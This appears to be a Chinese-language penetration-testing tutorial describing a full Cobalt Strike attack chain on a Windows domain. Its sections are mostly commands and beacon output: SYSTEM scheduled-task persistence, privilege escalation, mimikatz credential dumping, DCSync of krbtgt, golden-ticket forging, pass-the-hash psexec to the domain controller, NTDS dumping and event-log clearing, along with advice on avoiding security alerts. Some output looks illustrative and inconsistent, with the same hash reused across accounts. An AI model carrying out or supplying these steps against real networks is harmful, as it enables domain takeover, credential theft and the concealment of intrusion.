CS上线后权限维持与横向移动实战:从User到System的完整攻击链复盘
CS权限提升与横向移动实战:从普通用户到域控的完整攻击链
在真实的内部网络渗透测试中,获得初始立足点往往只是开始。如何从普通用户权限逐步提升至系统权限,并最终控制整个域环境,才是考验渗透测试人员技术深度的关键环节。本文将基于Cobalt Strike工具链,还原一个完整的攻击路径,涵盖权限维持、凭证窃取、横向移动等核心环节。
1. 初始权限获取与维持
当目标主机通过钓鱼邮件或漏洞利用执行我们的Beacon payload后,通常会以普通用户权限上线。此时的首要任务是建立持久化访问并尝试权限提升。
1.1 持久化技术选择
在Windows系统中,常见的持久化方法包括:
- 计划任务:通过
schtasks创建定期执行的计划任务 - 服务创建:安装自启动服务
- 注册表启动项:修改
HKCU\Software\Microsoft\Windows\CurrentVersion\Run - WMI事件订阅:利用WMI的永久事件消费者
# 通过计划任务实现持久化示例 schtasks /create /tn "UpdateChecker" /tr "C:\temp\payload.exe" /sc minute /mo 30 /ru SYSTEM提示:在实战中建议结合目标环境选择隐蔽性高的方法,避免触发安全告警。
1.2 权限提升路径分析
从User到System的常见提权路径:
| 提权方法 | 适用条件 | 成功率 | 隐蔽性 |
|---|---|---|---|
| UAC绕过 | 管理员账户 | 中高 | 中 |
| 服务漏洞 | 服务配置不当 | 高 | 低 |
| Token窃取 | 存在高权限进程 | 高 | 高 |
| DLL劫持 | 路径控制权 | 中 | 中 |
在CS中,可以通过elevate命令尝试多种提权模块:
beacon> elevate svc-exe [*] Tasked beacon to spawn a session as SYSTEM via service [+] host called home, session elevated via service2. 凭证收集与利用
获得高权限后,下一步是收集域内凭证信息,为横向移动做准备。
2.1 本地凭证提取技术
- Mimikatz:提取明文密码、Kerberos票据
- LSASS内存转储:通过
sekurlsa::logonpasswords获取 - SAM数据库提取:通过
reg save获取hash
beacon> mimikatz sekurlsa::logonpasswords [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 327680 bytes [+] received output: Authentication Id : 0 ; 308124 (00000000:0004b31c) Session : Interactive from 1 User Name : Admin Domain : CORP Logon Server : DC01 Logon Time : 2023/5/15 10:23:45 SID : S-1-5-21-1388762127-329068152-682003330-1103 msv : [00000003] Primary * Username : Admin * Domain : CORP * NTLM : 329153f560eb329c0e1deea55e88a1e9 * SHA1 : 18821b89d2a0f5a2c8b3d5e5e6e7f8a92.2 黄金票据攻击
当获取到krbtgt账户的NTLM hash后,可以伪造黄金票据:
- 获取域SID:
whoami /all - 获取krbtgt hash:
lsadump::dcsync /user:krbtgt - 生成黄金票据:
beacon> mimikatz kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-1388762127-329068152-682003330 /krbtgt:329153f560eb329c0e1deea55e88a1e9 /ptt3. 内网横向移动策略
3.1 网络拓扑探测
使用CS的portscan和netview模块快速绘制内网地图:
beacon> net view /domain [*] Tasked beacon to run net view /domain [+] host called home, sent: 104 bytes [+] received output: Domain -------- CORP TEST beacon> portscan 10.0.0.0/24 445,3389,5985 5 smb [*] Tasked beacon to scan 256 hosts on ports 445,3389,5985 [+] host called home, sent: 1048576 bytes3.2 横向移动技术对比
| 技术 | 所需凭证 | 网络要求 | 日志记录 | 检测难度 |
|---|---|---|---|---|
| WMI | 管理员 | 135/445 | 详细 | 中 |
| PSRemoting | 管理员 | 5985/5986 | 详细 | 中 |
| SMBExec | Hash | 445 | 有限 | 高 |
| 计划任务 | 管理员 | 445 | 详细 | 中 |
3.3 基于SMB的横向移动
利用获取的hash通过psexec方式横向移动:
beacon> psexec DC01 smb Administrator 329153f560eb329c0e1deea55e88a1e9 [*] Tasked beacon to run psexec on DC01 via smb [+] host called home, sent: 2048 bytes [+] established link to child beacon: 10.0.0.104. 域控接管与痕迹清理
4.1 域控持久化技术
- DCShadow攻击:修改域控属性
- SID History注入:添加域管理员SID
- 组策略修改:部署后门
beacon> dcsync_ntds /server:DC01 /csv:hashes.csv [*] Tasked beacon to dump NTDS.dit from DC01 [+] host called home, sent: 1048576 bytes [+] received 5242880 bytes of NTDS data4.2 操作痕迹清理
- 清除事件日志:
clearev - 删除计划任务:
schtasks /delete - 恢复服务配置:
sc config - 清除WMI持久化:
beacon> wmi event remove "UpdateChecker" [*] Tasked beacon to remove WMI event subscription UpdateChecker [+] host called home, sent: 1024 bytes在实际渗透测试中,每个步骤都需要根据目标环境的安全防护水平进行调整。高安全性的网络可能需要组合多种技术,并采用更隐蔽的时间间隔进行操作。